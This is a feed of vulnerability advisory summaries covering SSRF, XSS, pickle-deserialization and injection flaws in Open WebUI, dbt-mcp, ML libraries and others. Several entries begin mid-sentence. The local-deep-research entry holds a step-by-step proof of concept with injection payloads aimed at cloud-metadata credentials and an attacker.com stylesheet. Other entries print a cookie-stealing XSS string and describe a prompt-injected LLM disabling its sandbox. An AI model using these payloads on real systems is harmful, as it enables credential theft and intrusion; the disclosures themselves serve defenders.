Open WebUI versions 0.8.10 and earlier allow authenticated users to bypass model access control by appending ?bypass_filter=true to POST requests to /openai/chat/completions or /ollama/api/chat endpoints. The vulnerability exposes an internal-only FastAPI function parameter to external HTTP clients via query string binding, permitting any authenticated user to invoke admin-restricted models regardless of their assigned access grants. Vendor-released patch: v0.8.11 (March 2026). No public exploit code identified beyond the PoC in the advisory, but exploitation is trivial for any authenticated user.
Server-Side Request Forgery (SSRF) in Open WebUI versions ≤0.8.12 allows authenticated users with OAuth access to force the server to make HTTP requests to arbitrary internal resources and exfiltrate complete response data. Exploitation requires OAuth-enabled deployments with ENABLE_OAUTH_SIGNUP=true or OAUTH_UPDATE_PICTURE_ON_LOGIN=true. An attacker controls the OAuth provider's 'picture' claim URL, triggering server-side HTTP requests to cloud metadata services (AWS IMDS), localhost services (Redis, Elasticsearch), or internal network endpoints. The full response is base64-encoded and stored in the user's profile_image_url field, enabling complete data exfiltration. Fixed in version 0.9.0 per GitHub advisory GHSA-24c9-2m8q-qhmh. EPSS data not available; no CISA KEV listing indicates limited widespread exploitation, though publicly available proof-of-concept exists in the GitHub advisory.
Server-Side Request Forgery in Open WebUI's `validate_url()` function allows authenticated attackers to reach internal IPv4/IPv6 addresses, bypassing security controls via three distinct flaws: the validators library silently fails on IPv6 private-address checks (raising ValidationError which evaluates as falsy), IPv4-mapped IPv6 addresses (::ffff:10.0.0.1) evade IPv4 filtering entirely, and multiple IANA-reserved IPv4 ranges (0.0.0.0/8, 100.64.0.0/10, 192.0.0.0/24, 198.18.0.0/15, 203.0.113.0/24) remain unblocked. The vulnerability persists in the RAG web search, image editing, and other endpoints despite an earlier incomplete remediation attempt (CVE-2025-65958), enabling exfiltration of AWS IMDSv1 credentials and access to localhost-bound services. Publicly available exploit code exists (demonstrated POC in advisory), affecting Open WebUI ≤0.8.12 with fix released in version 0.9.0.
{id}/pin endpoint, which incorrectly checks for read permission instead of write permission. This privilege escalation enables read-only users to perform a write operation (toggling is_pinned state) that should be restricted to users with explicit write access. The vulnerability is limited to the pin operation and does not permit modification of note content, title, or access grants. Publicly available proof-of-concept demonstrates the bypass across all shared notes with read access.
Stored cross-site scripting (XSS) in Open WebUI ≤0.9.2 allows authenticated users with default speech-to-text permissions to upload polyglot WAV+HTML files through the audio transcription endpoint, achieving code execution in victim browsers and enabling full account takeover including administrator sessions. The vulnerability chains insecure file extension handling with unrestricted Content-Type serving and non-HttpOnly JWT storage to weaponize a single-click attack. Publicly available exploit code exists with video demonstration; no active exploitation confirmed by CISA KEV at time of analysis. CVSS 8.7 (High) reflects changed scope (S:C) and user interaction requirement, but real-world risk is elevated because the vulnerable permission defaults to enabled and the attack yields immediate admin-level access in typical deployments.
Authenticated admin users in pyLoad-ng can bypass the CVE-2026-33509 fix by setting the storage_folder to the Flask session directory (/tmp/pyLoad/flask), then downloading and reusing session files of other users via the /files/get/ endpoint to achieve account takeover. The original patch failed to block access to the session cache directory, leaving it accessible through the directory traversal protection bypass. Publicly available proof-of-concept code confirms the bypass is functional.
{user_id}/profile/image endpoint, executes scripts with access to localStorage and enables full account takeover of any user viewing the malicious profile image, including administrators. Two independent reporters demonstrated distinct vectors: one via HTML data URIs in new tabs (limited scope), and one via SVG data URIs served by the application origin (account takeover). No public exploit code or active exploitation has been confirmed, but the vulnerability requires only authenticated access and user interaction (viewing a profile image).
Remote authenticated actors with S3 write access can achieve code execution in Amazon SageMaker Triton inference containers by replacing model artifacts with malicious pickle payloads that are deserialized without integrity verification. Affected versions are SDK v2 before v2.257.2 and v3 before v3.8.0. The vulnerability requires high-privilege S3 access to the model artifact path but carries severe impact including arbitrary code execution within inference containers. No public exploit code or active exploitation has been identified at time of analysis.
Cleartext HMAC signing key exposure in Amazon SageMaker Python SDK versions <2.257.2 and <3.8.0 enables authenticated attackers with SageMaker describe API and S3 write permissions to forge model artifact integrity signatures and achieve remote code execution in inference containers. AWS released patches in v2.257.2 and v3.8.0 with security fixes addressing Triton HMAC key exposure and missing integrity checks. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, suggesting limited exploitation activity despite high CVSS score.
Authenticated server-side request forgery in ApostropheCMS allows low-privilege users to force the server to fetch arbitrary internal URLs through the rich-text widget import flow. Attackers with content editing permissions can exfiltrate internal data by crafting malicious image tags that trigger server-side fetch operations, with image-compatible responses being persisted and re-hosted by the application. Publicly available exploit code exists (full Python PoC published in GitHub advisory GHSA-pr28-mf3q-qpg6), enabling immediate weaponization. All versions through 4.29.0 are affected with no vendor-released patch identified at time of analysis, creating sustained exposure for organizations running this popular Node.js CMS.
dbt-mcp DefaultUsageTracker transmits unredacted MCP tool arguments-including raw SQL queries and credential-bearing --vars JSON-to dbt Labs telemetry by default without user opt-in. Affects dbt-mcp ≤1.17.0; tracking is enabled unless users explicitly set DBT_SEND_ANONYMOUS_USAGE_STATS=false or DO_NOT_TRACK=1 before installation, creating silent exfiltration of potentially sensitive database schema, credentials, and personally identifiable information. The vulnerability has been verified by proof-of-concept source code analysis and execution against dbt-mcp v1.15.1.
dbt MCP Server logs complete tool arguments including SQL queries and database credentials in plaintext to disk when file logging is enabled. Versions up to 1.17.0 write unredacted arguments from every tool invocation to dbt-mcp.log, with sensitive data such as raw SQL queries, credential-bearing vars payloads, and node selectors persisting indefinitely without automatic rotation. A local attacker with read access to the log file can extract credentials and SQL logic. Publicly available proof-of-concept demonstrates credential and PII extraction from log files.
Argument injection in dbt-mcp v1.15.1 through v1.17.0 allows MCP clients to inject arbitrary dbt command-line flags such as --profiles-dir, --project-dir, and --target via unsanitized node_selection and resource_type parameters, enabling attackers to redirect dbt's configuration and database operations to attacker-controlled locations. The vulnerability is exploitable via two independent vectors in the _run_dbt_command() function and has been verified by proof-of-concept code demonstrating arbitrary dbt profile injection. Vendor-released patch available in v1.17.1.
CSS injection in mistune's Image directive plugin allows unauthenticated remote attackers to inject arbitrary CSS properties via the :width: or :height: options in fenced image directives, enabling full-page phishing overlays and UI redressing attacks. The vulnerability stems from a prefix-only regex validation (_num_re.match() with no end-of-string anchor) that accepts values like '100vw;position:fixed;background-color:#e11d48;...' and renders them unescaped into style= attributes. Confirmed fixed in v3.2.1; publicly available proof-of-concept demonstrates full-viewport colored overlay generation from a single malicious :width: directive.
Cross-site scripting (XSS) vulnerability in mistune's render_toc_ul() function allows attackers to inject arbitrary HTML and JavaScript into table-of-contents output by crafting malicious heading IDs. When heading identifiers are derived from user-supplied text (standard practice for readable slug anchors), an attacker can break out of the href attribute context with a payload like `x"><script>alert(document.cookie)</script><a href="`, causing the script block to execute in the rendered TOC. The vulnerability requires user interaction (UI:R) to view the poisoned TOC but affects all users of the generated page. Vendor-released patch available in mistune 3.2.1.
Remote code execution in HuggingFace Diffusers library (versions < 0.38.0) allows attackers to execute arbitrary Python code when victims load malicious pipelines from Hugging Face Hub repositories. The vulnerability bypasses the trust_remote_code=True safeguard through a type coercion flaw where None values are interpolated as 'None.py' filenames. Attackers can achieve silent code execution by publishing repositories containing a malicious None.py file alongside legitimate-looking configuration, requiring only that victims call DiffusionPipeline.from_pretrained() on the attacker's repository. EPSS data not available; no public exploit identified at time of analysis. Vendor-released patch: version 0.38.0.
pyzipper before version 0.4.0 fails to use AE-2 encryption format due to an operator precedence bug, causing CRC32 checksums to be stored unencrypted in ZIP headers. Attackers with access to encrypted archives can extract plaintext CRC32 values and conduct brute-force attacks on small or low-entropy files to recover their content without decrypting the AES encryption itself. Large or high-entropy files remain practically safe under current computational constraints, but the vulnerability represents a cryptographic bypass for files under approximately 20 bytes.
Privilege escalation in wger fitness manager allows gym trainers to impersonate gym managers via session-chain attack. An authenticated trainer exploits flawed session-flag logic in the trainer-login endpoint to bypass permission checks - first switching into a low-privilege user, then leveraging the inherited 'trainer.identity' session flag to hop into manager accounts. Publicly available proof-of-concept demonstrates complete takeover of gym administration with CVSS 8.1 (network-accessible, low complexity). No vendor patch confirmed at time of analysis; vulnerability actively disclosed by wger-project GitHub advisory GHSA-9qpr-vc49-hqg2. EPSS score not available, not in CISA KEV. Root cause is CWE-269 (improper privilege management) in core/views/user.py lines 169-178.
{id}/logs/ and /api/v2/routine/{id}/stats/ endpoints. Detailed proof-of-concept with Python exploit confirms trivial exploitation against wger <= 2.5.0a2. CVSS 7.5 rates this High severity, but NOTE: vector PR:N appears inconsistent with authenticated-only access described - attackers need valid credentials, suggesting actual vector should be PR:L. EPSS data not available. No CVE KEV listing or public exploit repositories identified beyond GitHub advisory disclosure. Patch status unconfirmed - GitHub advisory references fix commit but no released version number provided in available data.
Local code execution in the claude-code-cache-fix npm package (v3.5.0 and v3.5.1) lets attacker-controlled filesystem path names run arbitrary Python inside a victim's Claude Code process. The bundled tools/quota-statusline.sh interpolates Claude Code's statusline hook stdin — which reflects user-controlled paths such as cwd, workspace.current_dir, workspace.project_dir, and transcript_path — directly into a Python triple-quoted literal, so a directory name containing the byte sequence ''' closes the literal early and executes following bytes as Python at the user's privilege on every statusline redraw. A working injection payload is publicly available exploit code (published in the GHSA advisory and the T6/T7 regression tests); the issue is not listed in CISA KEV and no EPSS score was provided.
Unsafe deserialization in LangSmith SDK's prompt pull methods allows remote attackers to execute server-side request forgery (SSRF) and redirect LLM traffic to attacker-controlled infrastructure when applications pull public prompts from LangSmith Hub. The SDK deserializes untrusted prompt manifests containing serialized LangChain objects with attacker-controlled constructor arguments, including malicious base_url configurations, custom headers, and secret references. Exploitation requires user interaction (developers must call pull_prompt with a malicious owner/name identifier), but no authentication is required to publish malicious prompts to the public Hub. Vendor-released patches in Python >= 0.8.0 and JS/TS >= 0.6.0 now block public prompt pulling by default, requiring explicit opt-in via dangerously_pull_public_prompt flag. EPSS data not available; no CISA KEV listing or public exploit identified at time of analysis.
Unauthenticated open redirect in Authlib's OpenIDImplicitGrant and OpenIDHybridGrant authorization endpoints allows remote attackers to redirect users to attacker-controlled URLs by submitting authorization requests that omit the openid scope. The vulnerability occurs because scope validation happens before redirect_uri validation, allowing the error handler to return an HTTP 302 with an unvalidated attacker-supplied redirect_uri. A proof-of-concept GET request demonstrates the flaw trivially; no authentication, valid client_id, or user interaction beyond clicking the link is required, though the CVSS score of 6.1 reflects the requirement for user interaction (UI:R) to click the phishing link. Actively exploited in the wild (KEV status), this is a Medium-severity open redirect enabling credential harvesting attacks.
{"x": "A" * 200000} def run(): try: ujson.dump(obj, BadFile()) except RuntimeError: pass run() tracemalloc.start() gc.collect() base = tracemalloc.get_traced_memory()[0] for i in range(5): run() gc.collect() cur = tracemalloc.get_traced_memory()[0] print(i, cur - base) ``` Any application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response. The missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1). Replacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.
Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.
Sandbox escape in OpenClaude (npm package openclaude) versions before 0.5.1 allows a prompt-injected LLM to disable host sandboxing by setting the model-controlled `dangerouslyDisableSandbox: true` flag in any Bash tool_use call, yielding full unsandboxed command execution on the host. CVSS 4.0 scores this 9.3 Critical (AV:N/AC:L/PR:N/UI:N, VC/VI/VA:H); no public exploit identified at time of analysis beyond the reporter's PoC, but the upstream fix has been merged. The flaw is especially severe because it is reachable under default settings (`allowUnsandboxedCommands` defaults to true).
Arbitrary code execution in imgaug library (versions through 0.4.0) occurs when the BackgroundAugmenter class deserializes malicious pickle payloads without validation in its multiprocessing worker method. Attackers who can influence queue data-through compromised shared queues, malicious input scripts, or social engineering-can achieve remote or local code execution depending on deployment context. CVSS 9.8 critical severity reflects network-based exploitation without authentication, though EPSS probability is low (0.02%, 6th percentile), indicating limited observed exploitation activity. No CISA KEV listing or public exploit code identified at time of analysis.
Arbitrary code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load malicious model checkpoint files through the Trainer.load() method. The vulnerability stems from unsafe PyTorch deserialization that processes untrusted Pickle objects without the weights_only security parameter. Attackers can embed malicious Python code in model files distributed through repositories, shared datasets, or social engineering campaigns. Despite the 8.8 CVSS score indicating critical severity, EPSS scoring at 0.06% (19th percentile) suggests very low real-world exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis.
Arbitrary code execution in Snorkel library (Python) through version 0.10.0 enables remote attackers to execute code by supplying malicious pickle files to the BaseLabeler.load() method. The vulnerability stems from unsafe deserialization using pickle.load() without input validation, allowing attackers to craft serialized objects that execute arbitrary commands during deserialization. With EPSS at 6th percentile, exploitation probability remains relatively low despite the critical CVSS score, and no active exploitation (KEV) or public proof-of-concept has been identified at time of analysis.
Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.
Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.
Remote code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load untrusted model files via MultitaskClassifier.load(). The vulnerability exploits insecure Python object deserialization through torch.load(), allowing attackers to embed malicious code in model weight files that executes upon loading. EPSS score of 0.06% (19th percentile) suggests low observed exploitation probability in the wild, though SSVC framework indicates total technical impact once exploited. No public exploit code or active exploitation confirmed at time of analysis, but exploitation requires only that a data scientist or ML engineer load a malicious .pkl model file.
Command injection in Adversarial Robustness Toolbox (ART) up to version 1.20.1 enables remote code execution through unsafe eval() usage in Kubeflow pipeline components. The robustness_evaluation_fgsm_pytorch.py script directly evaluates user-controlled --clip_values and --input_shape arguments without sanitization, allowing Python code injection. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicating network-exploitable unauthenticated access, this represents critical risk in automated ML pipeline environments where attackers can control pipeline configurations. EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, though the attack vector and ML tooling context create significant supply chain risk in CI/CD and research environments.
Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.
Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.
Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.
Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.
Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.
Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.
Insecure deserialization in Optimate's neural_magic_training.py script enables remote code execution when loading PyTorch model files. The _load_model() function uses torch.load() without the weights_only=True security parameter, allowing attackers with low privileges to execute arbitrary Python code by providing malicious .pt or .pth files via the --model command-line argument. EPSS indicates low exploitation probability at 0.06% with no active exploitation confirmed.
The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.
Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.
Remote code execution in Optimate's neural_magic_training.py script allows authenticated attackers to execute arbitrary code via malicious PyTorch model files. The vulnerability stems from unsafe deserialization when loading model state dictionaries without PyTorch's weights_only=True security flag, enabling pickle-based arbitrary object execution. With an EPSS score of 0.06% and no confirmed exploitation, this represents a moderate risk primarily in environments where users can upload or specify model files.
Arbitrary code execution occurs in PyTorch Lightning 2.6.0 and earlier when loading malicious checkpoint files. The LightningModule.load_from_checkpoint() method deserializes untrusted Pickle data without security restrictions, allowing attackers to execute arbitrary Python code when victims open crafted .ckpt files. EPSS score of 0.06% (19th percentile) indicates low observed exploitation probability, and no public exploit code or CISA KEV listing exists at time of analysis. Attack requires local access and user interaction (opening a malicious checkpoint), limiting remote attack scenarios to social engineering or supply chain compromise.
Remote code execution in Mamba language model framework (through version 2.2.6) allows unauthenticated attackers to execute arbitrary Python code by publishing malicious models on HuggingFace Hub. When victims call MambaLMHeadModel.from_pretrained() on a weaponized model repository, insecure pickle deserialization executes attacker-controlled code in the context of the victim's process. Despite the critical CVSS 9.8 score and network attack vector requiring no authentication, EPSS probability remains extremely low (0.02%, 5th percentile), suggesting limited real-world exploitation to date. No CISA KEV listing or public POC identified at time of analysis.
Remote code execution in Ludwig framework ≤0.10.4 allows unauthenticated network attackers to execute arbitrary code by supplying a malicious PyTorch model file to the ludwig serve endpoint. The vulnerability stems from unsafe deserialization in the model loading component, which uses torch.load() without the weights_only=True safety parameter. With CVSS 9.8 (critical network vector, no authentication required) but only 0.02% EPSS, this represents a high-severity issue in vulnerable deployments, though widespread exploitation has not been observed. No CISA KEV listing or public POC identified at time of analysis.
{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.
Stored cross-site scripting (XSS) via CSS injection in Open edX Platform allows enrolled students to inject arbitrary CSS into discussion notification emails sent to other users by bypassing insufficient HTML sanitization in the clean_thread_html_body() function. The vulnerability affects all versions prior to the fix commit and enables email tracking through malicious stylesheets, content spoofing, and phishing attacks against recipients who view notification emails.
Server-Side Request Forgery in Budibase self-hosted instances allows authenticated Global Builder users to bypass SSRF protections via trivial substring manipulation in plugin URL uploads. The vulnerability exploits a flawed validation check that accepts any URL containing '.tar.gz' anywhere in the string, enabling requests to internal cloud metadata services (AWS IMDS at 169.254.169.254), CouchDB, Redis, and private network ranges when chained with the BLACKLIST_IPS bypass (CVE-2026-45060) or via HTTP redirect chains. CVSS 7.7 (High) with Changed Scope indicates cross-boundary impact from application to infrastructure layer. Vendor-released patch available in version 3.35.10 per GitHub security advisory GHSA-xh5j-727m-w6gg. EPSS data not available; no CISA KEV listing at time of analysis. Publicly available exploit code exists in researcher's GitHub repository with Docker-based proof-of-concept.
{% include %} and {% render %} Liquid tags. The built-in FileSystemLoader and CachingFileSystemLoader failed to reject absolute paths, escaping the configured search path; no public exploit identified at time of analysis but the vendor advisory (GHSA-8p4x-wr7x-3788) publicly documents the bypass mechanism.
Server-side request forgery (SSRF) in GuardDog 1.0.0 through 2.9.0 allows remote attackers to exfiltrate GitHub personal access tokens and probe internal networks via malicious repository URLs. The vulnerability stems from blind string replacement in ProjectScanner.scan_remote() that fails to validate hostnames before appending authentication credentials. No vendor-released patch identified at time of analysis. Publicly available exploit code exists via GitHub advisory reproduction steps. CVSS 8.2 (High) with network vector and no authentication required.
GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).
pgAdmin 4 before version 9.15 allows unauthenticated attackers to bypass account lockout and perform unbounded password-guessing attacks against INTERNAL authentication accounts by exploiting Flask-Security's default /login endpoint, which does not enforce the locked column that the custom /authenticate/login view relies on for brute-force protection. The vulnerability affects only accounts using pgAdmin's INTERNAL authentication source; LDAP, OAuth2, Kerberos, and Webserver authentication methods are not vulnerable because they do not use local passwords.
Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.
Command injection in BentoML 1.4.38 and earlier allows attackers to execute arbitrary code on build hosts when victims containerize malicious bentos. Exploitation occurs during the `bentoml containerize` workflow when unvalidated `envs[*].name` and `docker.base_image` fields from imported bentofile.yaml are interpolated into generated Dockerfiles without escaping, enabling newline-injection of RUN directives executed by `docker build`. This is a sibling vulnerability to CVE-2026-33744 and CVE-2026-35043 which patched the same injection class in `system_packages` fields but left these additional attack surfaces unaddressed. Patch version 1.4.39 available from vendor. No CISA KEV listing or public POC outside gated HuggingFace repository at time of analysis, but end-to-end reproduction confirmed by reporter on BentoML 1.4.38.
